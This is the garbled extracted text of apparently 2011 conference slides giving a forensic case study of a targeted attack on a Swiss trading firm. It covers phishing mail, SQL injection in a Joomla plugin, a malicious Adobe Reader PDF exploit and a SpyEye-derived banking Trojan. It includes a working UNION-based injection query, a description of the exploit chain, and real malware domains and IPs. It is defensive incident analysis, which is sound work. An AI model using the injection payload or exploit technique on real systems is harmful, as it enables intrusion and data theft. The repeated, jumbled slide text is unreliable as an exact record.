Cyber Crime in Nowadays Businesses - A Real Case Study of Targeted Attack

Your texte here .
Hashdays 2011 Cybercrime in nowadays businesses: A real case study of targeted attack
Frdric BOURLA Head of SWISS ETHICAL HACKING ORIGINAL Ethical Hacking Department
2011 High-Tech Bridge SA www.htbridge.ch
0x00 - #whoami
Your texte here . Frdric BOURLA Head of Ethical Hacking Department High-Tech Bridge SA
~12 years experience in Information Security LPT, CISSP, CCSE, CCSA, ECSA, CEH, eCPPT CHFI, GCFA & GREM in progress RHCE, RHCT, MCP frederic.bourla@htbridge.ch
ORIGINAL SWISS ETHICAL HACKING

0x01 - #readelf prez

Your texte here .have Cyber attacks
evolved: evolved They became more sophisticated They are often targeted It is not uncommon anymore to observe attacks managed by specialized groups and initiated by unfair competitors
This talk is an example of such threats. It is based on a post-incident investigation which posttook place in October 2010 To preserve 2010. clients anonymity, lets call him FedorFedorTrading. Trading 1 round of 50. To save time, please keep your questions until the end.
Table of contents
Your - About me 0x00 texte here . 0x01 - About this conference 0x02 - Projects context 0x03 - Mail analysis 0x04 - Clients Website analysis 0x05 - Malware analysis 0x06 - Conclusion

0x02 - Projects context

Your texte here . Last year, the
CTO of a well known financial us. institution contacted us
FedorFedor-Trading thought about a kind of attempt, Phishing attempt and the CTO expected us to help him reassuring the CEO that everything was fine, and that no real attack really occurred. The initial project was a quick investigation reasons, driven by political reasons and it began with an analysis of the emails that they received in one of their administrative mailboxes.
Table of contents

0x02 - Mail analysis

Your texte here .several They received
emails which appeared to have been sent from Fedor-Trading:


Your texte here . At a first glance,
all suspicious emails received didnt look like Phishing Phishing: There is no multiple spelling mistake per line The content itself sounds sophisticated All emails dealt with real matter and entice Forex users to open a PDF Instead, all those targeted attacks. attacks emails sounded like


Your texte here . reveal SMTP headers
the sending domain:


Your texte here . FQDN matches
IP address 67.227.134.84.
The hosting server is located in US US.


Your texte domain Parent here .
neonrain-vps.com belongs to Neon Rain Interactive since 26 March 2008.


Your texte system Remote here .
hosted an out-of-date Apache out-ofengine and is weakly configured configured: Talkative banners Some indexed directories Lots of Information Disclosure Publicly available cPanel interface Some outdated components


Yourreverse DNS A texte here .
lookup shown that the IP address 67.227.134.84 was used to host multiple websites websites. At least 82 domains were hosted on the same server. The combination of these factors gave us a strong likelihood that malicious emails were sent from a compromised Web server thus server, attackers. concealing the identity of attackers


Your texte here . Domain host.neonrain-vps.com
had
an
MX
record for this host. This configuration permitted to bypass most protections, and all Fedorantispam protections Tradings clients who did not rely on a deeper SMTP analysis have probably received those suspicious emails. A quick analysis of the received emails consequently lead us to think about a attack, targeted attack and not to a blind one We definitely needed to get more information and asked for an FTP access to FedorTradings website.
Table of contents

0x04 - Clients Website analysis

Your texte here . The frontal website
was hosted externally externally, on Infomaniak Network. The first thing we noticed is that the website hosted a talkative robots.txt file robots. file:


Your texte here file The passwd .
accounts, but compromise.
revealed several forgotten no trace of a potential
The website contained huge amount of logs logs. We downloaded them to carry out local inspection.


Your texte here . Fedor-Tradings
website attacks. automated attacks
was
often
under


Your texte here .
In parallel with attack patterns queries in those huge logs (quite slow as there were quite slow, no timeframe for this hypothetic attack), we looked furtively at the website security level. Despite a kind of Web Application Firewall successfully prevented our first attacks, the website sounded vulnerable to SQLi SQLi.


Your texte herelogs We parsed .
for usual SQL injections signatures, and lots of occurrences were also identified.


Your texte here .injections Quite evolved
were attempted.
First identified attacks were unsuccessful and only relied on automated exploitation tools. For example, banner & hexadecimal constant used while trying to determine the number of fields in the SQL query indicated Havij tool.


Your texte here step The next .
therefore consisted in simulating such automated attacks to assess the level of information which could have been collected by hackers. Indeed, we used the current 1.12 version of Havij against Fedor-Trading. This tool has been proven inefficient in this specific case.


Your texte here . Nevertheless
it permitted to confirm the vector, SQLi attack vector as the name of the database was successfully dumped.


Your order to. In texte here efficiently
identify successful SQLi exploitation in the huge web server logs, we asked the client for temporary credentials on their Infomaniaks web administration page. This offered us the best view of operational structures, and therefore permitted to finefinetune our queries with keywords which had a high probability of occurrence in case of successful SQLi exploitation.


Your texte here . faster This was much faster.
New attacks were quickly identified identified. More pernicious, those attacks clearly shown that Fedor-Tradings website was Fedorcompromised, compromised and that nearly whole backend stolen. database was stolen


Your textemost. Indeed, here tables
were remotely dumped by hackers, and customers email addresses of stolen. our client were stolen
The source IP address 89.165.79.237 was located in Iran and didnt hosted any publicly available service. It was most probably a bot intended to hide attackers identity.

Your texte here . web The impacted
application consisted of selfself-made code as well as Joomla open source CMS and several commercial plugins plugins.
The exploited vulnerability resided in a Joomla commercial plugin named Sh404Sef Sh404Sef. 404Sef The latter security module provides SEO SEO, Rewriting. analytics and URL Rewriting It is also supposed to prevent XSS, flooding and requests But other malicious page requests unfortunately it allowed hackers to inject code. SQL code In that particular case, the insecurity. security module brought insecurity

Your texte here . The SQLi injection
vulnerability was a little bit tricky tricky, and none of the leading it. automated tools was able to exploit it Most of them even didnt detect any security problem on Fedor-Tradings website. Facts are that only a slow and manual attack could have permitted its exploitation.


Your texte PoC,. we As a here
demonstrated that the following parameters in GET requests permitted to remotely dump all sensitive information from the backend database:


Your this attack, In texte here .
in the title window.
information leakage occured bar of Internet browsers
The 1st request simply permits to identify the version. PHP engine version


Your texte here . Requests 2 and
3 permit to get username and database name name.


Your texte hereto Requests 4 .
databases. 6 permit to list databases


Your texte here . GSDB only hosts
databases, 3 databases as there is no result for the 7th GET request request:
?id=3-9999+union+SELECT%20schema_name%20FROM %20information_schema.schemata%20limit%203,1--


Your texte here and Requests 8 .
9 permits to get schema and
tables. tables


Your texte th request The 10 here .
permits database. tables from main database
to
enumerate
Request 11 enumerates columns from the table. jos_users table


Your texte here . And finally the
12th request permits to collect names, emails et passwords hashes from the jos_users table.
With a small automation script it was script, possible to remotely dump all sensitive tables, tables such as personal data related to Forex accounts from the TAibs_c table and trading platform administrators' password hash from the USERS table.

Your texte here . After the version
random salt function.
in
1.5, Joomla relied on a its password hashing
This approach permits to efficiently disturb Timeattacks: Time-Memory TradeOff attacks
$hash=md5($pass.$salt)
Since then, Rainbow Tables attacks against accounts gathered from compromised Joomla websites remain inefficient.

Your texte here . Nevertheless,
one of the administrators salt. accounts had no salt The password was therefore stored in a weak MD5 hash It was MD5 hash. most probably an old account created with a previous version of the web application, which remained unchanged since the migration. The vulnerable account consultant. external consultant belonged to an
Anonymised:Anonymised:anonymised@anonymised .com:c2e285cb33cecdbeb83d2189e983a8c0

Your texte here . It was possible
to break it in a few seconds seconds.
account. Hackers never logged with this account Fortunately, a noisy defacing would have been out of scope and totally counterproductive. counterproductive


Your texte here . Internal admin
accounts were salted and strong enough to resist most dictionary attacks.

Table of contents

0x05 - Malware analysis

Your texte having here . After
stolen MySQL databases through an SQL Injection on the trading platform, hackers ran into a Social Engineering phase which targeted Forex users. Most of them received a credible fake email which enticed into opening an embedded PDF file. Therefore, the last part of the attack which required a deep analysis dealt with the PDF files attached to the fake emails. Several emails were sent, but all of them included a renamed version of the same PDF. PDF


Your texte here . PDF is one of the
most prevalent method for exploitation: remote exploitation Victims can be easily sent targeted socially engineered emails with such attachments PDF links are common on websites and may permit drive-by exploitation driveThis file format is widely spread among companies and most often authorized by perimeter protections It is still quite hard for antivirus to detect malicious content


Your texte here . The 9th October
2010, 2010 only 4 antivirus on 43 detected a threat in this PDF, which is a rate: 9.3% detection rate AntiVir Emsisoft Ikarus Microsoft
One year later, the 13rd October 2011 only 2011, 16 antivirus on 43 efficiently detect a threat. This is still a low detection rate of 37. 37.2%.

Your texte PDF . Indeed, here supports
different compression code: formats which help hiding code FlateDecode ASCIIHexDecode LZWDecode ASCII85Decode RunLengthDecode It also supports encryption encryption: 40+128 bits RC4 128 bits AES


Your texte here . And PDF format
also natively supports fromCharCode. Unicode, Hex as well as fromCharCode All of them are widely used for obfuscation purpose. Internal logical streams can embed other objects which support further client side scripting, such as Flash ActionScript ActionScript. It offers an efficient way to carry out Heap Hunting. Spraying and Egg Hunting
For all those reasons, PDF is an attack hackers. vector of choice for hackers

Yourour case, . In texte here the
maliciously crafted PDF file exploited a critical vulnerability which affected all Adobe Reader applications prior to version 9.4 on multiple OS (CVE-20102883). Opening this file within Adobe Reader v9.3.4 or any older version could alter its execution flow and run arbitrary code code. This vulnerability was actively exploited on Internet when the attack occurred. Since Adobe Reader v.9.4 was publicly available on 2010, 5th October 2010 this attack implied a 0-day with a high rate of successful compromise.


Yourquick here . A texte search
for risky keywords within PDFID revealed client-side code.
Quite unusual in malicious PDF
Action automatically performed executed on form load


Your texte here . The proportion
of randomness in the file can also tell us more about this PDF.
The total entropy and the entropy of bytes inside streams objects are close to the max of 8, which suggest a normal PDF document.


the entropy outside streams high. object is also quite high In a normal PDF, it is usually between 4 and 5. This may leads us to think about a malformed PDF document, where data is added without stream objects. stream objects
We can also notice that there is only one %%EOF document, %%EOF in the document despite there are %%EOF EOF, lots of bytes after the last %%EOF which added. also suggests that data has been added


Your texte here . So a good idea
should be to dig a little bit further through Origami Unfortunately the Origami. errors. Walker GUI was tricked into errors


Your texte here .extraction Command line
problems, also got problems but at least confirmed some results.


Yourfact, even. In texte here Adobe
damaged. thought it was damaged Unfortunately he managed to read it it.


Your texte flaw . Logical here remained
identify. easy to identify


we were still not able to extract embedded JavaScript code.


Your texte 3 contains Object here .
the string /JavaScript and was configured to execute code from object 7. Object 30 also contained the string /JS and holds code code.


the payload was quite heavily
obfuscated. obfuscated


Your texte here .PDF Most crafted
rely on simple XOR with a single byte long key or use ROL/ROR operations for obfuscation purpose But not there As a consequence, tools like there. result. XorSearch didnt get any result
The only one solution seemed to be the reverse engineering approach approach.

Your texte here . Indeed, interesting
content was encrypted with a 4 bytes XOR operation operation.


Your texte here . After the identification
of the 4 bytes key 0x4114D345, we were able to extract the mea. mea.dll file embedded in the malicious PDF. This one was not encrypted and revealed encrypted, the final URL which hosted the ultimate payload, as confirmed by following analysis.


Your texte here . Opening CoolType.dll CoolType.
in Adobe Reader with IDA revealed the abused strcat. The strcat uniqueName field from the SING table structure was being used in that function.


Your texte here . The exploit relied
on /AcroForm JavaScript to detect the version of Adobe Reader and payload. switch to the appropriate payload Then the heap spray was used to put ROP data into memory at a guessable address. This heap spray followed a huge RED sled, which acted as a more classical NOP string while transitioning between the stack Buffer Overflow and the ROP payload. Gadgets module compiled used in the ROP payload come from icucnv36.dll icucnv36 icucnv36.dll, which was not with ASLR, as discussed soon. ASLR

Your texte here . Attackers used
techniques. ROP techniques Instead of redirecting the execution flow on the heap, it jumps to a Code section in a DLL which indeed has the Execute rights. This is achieved by overwriting the Saved EIP on the stack, and by chaining calls on this DLL at specific places through a RET sled crafted on the stack.


Your texte here created The exploit .
an empty iso88591 file iso88591 and mapped it to memory in order to get an space, executable space where shellcode could be copied and executed.


Your texte here . The AcroRd32.exe
process was also abused to load icucnv34.dll module, a DLL which icucnv34 34. was not compiled with ASLR and is therefore always loaded at the same address in memory. It is then possible to use its own IAT Kernel32 to get the address of Kernel32 ASLRed APIs. APIs


Your texte here . As a consequence,
both DEP & ASLR were
bypassed! bypassed Finally, the exploit also worked on Vista and 7, as it didnt use hardcoded XP syscall. syscall So basically it was already the end of the game


Your texte here . Malware also
used some tricks to prevent analysis. its analysis For example, each time we used a BP, Memory BP we arrived in a long loop which always ended by an exception exception.
After having dropped another binary from itself, the mea.dll overwrites part of its mea. dump. own Text section to prevent memory dump Malware running example, dropped, also skipped part of its code while within Immunity Debugger. For the adobe1.exe file was not even if hidedebug plugin was used.


Your texte here . was Another trick
name. to parse processes name When Process Monitor was running, we didnt see anything We had far more results by just renaming the tool, we binary. showed the creation of a new binary File access monitoring confirmed the creation of the new adobe1.exe binary.

Your texte here . This new binary
was an unencrypted dropper dropper.


Your texte here .confirmed This was also
through a behaviour
analysis. analysis Here we simply used a rogue DNS service to redirect traffic to an analysis server.


Your texte here . This process downloaded
update2 the update2.exe binary on www.bringithomedude.com.


Your texte here .are! And here we
The final aim of hackers was to silently get and execute a banking Trojan derived from SpyEyes code.
So lets summarize whats happened here.


Your texte here .


Your texte here .


Your texte here .


Your texte here .


Your texte here .


Your texte here .


Your texte here .


Your texte here . 1.exe The file adobe adobe1
is a simple loader of 2560 bytes. It was not encrypted. encrypted On the other hand, the final update2.exe update2 malware was a C# based binary of 668 Kb which included several protections aimed at preventing its reverse engineering. BASE64 Disassembly revealed BASE64 encoding for raw data as well as encryption algorithms MD5 based on MD5 (System.Security.Cryptogra phy.MD5CryptoServiceProvider), 3DES (Sys tem.Security.Cryptography.TripleDESCryptS erviceProvider) and AES (System.Security. Cryptography.RijndaelManaged).


Your texte here . When this attack
occurred, Those files were antivirus. undetected by most antivirus
A few European antivirus detected a potential threat, but all Eastern solutions such as Kaspersky, NOD32, DrWeb32 or VBA32 didnt detect anything anything. It is therefore possible that the Russian market was the initial target of our malware writers.


Your texte here . The 8th October
2010, 2010 16 antivirus on 43 detected a potential threat in the final binary. Detection rate was about 37%. 37% The 15th October 2010 19 antivirus on 43 2010, were efficient. Detection rate is about 44%. 44%
Around 8 months later, the 2nd June 2011 2011, 34 antivirus on 43 detected a potential threat. This is a detection rate of 79%. 79% Kaspersky, McAfee, Sophos and Microsoft were the most reactive.

Your texte Panda Gdata, here .
and Sophos were the next
ones. ClamAV, eSafe, F-Secure, Fortinet & PrevX have proven far less effective. The final payload behave like Zbot It was Zbot. SpyEyes. based on a mutation of SpyEyes It is a Trojan aimed to target financial sector and it is able to disable Windows Firewall and steal financial data, such as credit card numbers, eBanking information or trading credentials. Common Trojan features were also available, such screen capture, additional malware download or remote administration capabilities.

Your texte here . Upon execution,
the Trojan creates a folder svhostxxup. named svhostxxup.exe in the c:\ drive. Then it config. svhostxxup. creates files config.bin and svhostxxup.exe in that folder. The latter binary is then called. It is responsible for creating new memory pages in several system applications address space, space and therefore permits attackers to inject their malicious code into privileged programs. programs


Your textethen . Trojan here modifies
a few registry keys and
persistent. become persistent


Your texte here . The Reverse-Trojan Reverse-
also verifies the path run, from which it was run and it checks that file C:\Documents.exe, C:\Documents and Settings\user\Desktop.exe or C:\Documents and Settings\user\Desktop\update2.exe does exist in order to authorize or deny its own execution. It also check for the registry key HKEY_CLASSES_ROOT\AppID\update2.exe. These are common practices among malware writers to help disturbing Reverse Engineers. Engineers


Your textethen . Trojan here gets
the compromised computer name by querying LSA and lists the C:\ drive before doing a recursive search of living directory. files within its parent directory
Getting computer and user names is also a Trojans, common practice for Trojans as they most often need to declare unique zombies on their C&C server to permit accurate communication with Bot Herders.


Your texte tried to Trojan here .
send HTTP packets to 2
servers: different servers
After having redirected those IP addresses with ARP Poisoning and simulating an HTTP service, service we can see Trojan saying a kind of Hello, Im here to those web applications. here Hello,


Your texte here . The first server
was probably aimed to offer an alternate route in case the second one was taken down. It actually forwarded its packets to greenchina.com.


Your texte here . Involved domains
exist since quite a long
time. time serv.com and greenchina.com domains were respectively registered in November 1994 and April 2001 The IP addresses which 2001. received the suspicious GET requests, 211.119.134. and 218.145.65.200, 211.119.134.197 218.145.65.200 respectively hosted 1'644 and 11 websites websites. Despite its parameters, the URL
http://www.greenchina.com/?guid=UserName!COMPUTERNAME! 00CD1A40 did not look like so a dangerous dangerous...


Your texte here . It visually reached
webpage a standard webpage
But there were hidden information information.

Table of contents

0x06 - Conclusion
Your texte here . Finally, the target
of this complex attack was not directly our client, but his own customers. customers For sure, it has also impacted Fedor-Trading Fedor-Trading. Once the website was compromised, fast. everything happened really fast
Attacks were initiated by an unfair competitor who afforded the services of market. underground market Both financial companies Switzerland and abroad. abroad
are
present
in
0x06 - Conclusion
Your globally the So texte here .
attack implied:
Malware Code Writing (dropper, downloader, Banking Trojan) 0-day Uncovering (Adobe Reader stack buffer overflow)
Social Engineering (Forex Regulation) Web Attacks (Sh404Sef SQL Injection) And most probably money transfer In fact, we are typically in a modern scenario of underground skills renting. renting.
0x06 - Conclusion
Your texte here .

0x06 - Conclusion
Your texte heremany This offers .
business opportunities.

0x06 - Conclusion
Your texte here cybercrimes Organised .
exist in lots of countries, and a sophisticated underground economy has rapidly flourished those last years. But the huge majority of attacks Brazil. involved China, Russia and Brazil

0x06 - Conclusion
Your texte here . There is much
Fun, less Hacking For Fun and Profit. much more Hacking For Profit Cybercrime has therefore become an enterprise with a thriving underground economy. New cybercriminals dont have to develop their own code They can rent botnets and even purchase licensed malware that comes with its own tech support support. Cybercrime is now developing and spreading faster than ever. So welcome in the World Wild Web Web And happy Forensics! :)

\xC29900: RETN 99
Your texte here .
Your questions are always welcome! frederic.bourla@htbridge.ch


Cyber Crime in Nowadays Businesses - A Real Case Study of Targeted Attack

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Cyber Crime in Nowadays Businesses - A Real Case Study of Targeted Attack

Diunggah oleh

Hak Cipta:

Format Tersedia

Your texte here .

ORIGINAL SWISS ETHICAL HACKING

0x01 - #readelf prez

ORIGINAL SWISS ETHICAL HACKING

0x02 - Projects context

CTO of a well known financial us. institution contacted us

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

emails which appeared to have been sent from Fedor-Trading:

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

the sending domain:

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

The hosting server is located in US US.

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

neonrain-vps.com belongs to Neon Rain Interactive since 26 March 2008.

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

ORIGINAL SWISS ETHICAL HACKING

0x02 - Mail analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

accounts, but compromise.

revealed several forgotten no trace of a potential

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

website attacks. automated attacks

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

0x04 - Clients Website analysis

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

in the title window.

information leakage occured bar of Internet browsers

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis

3 permit to get username and database name name.

ORIGINAL SWISS ETHICAL HACKING

0x04 - Clients Website analysis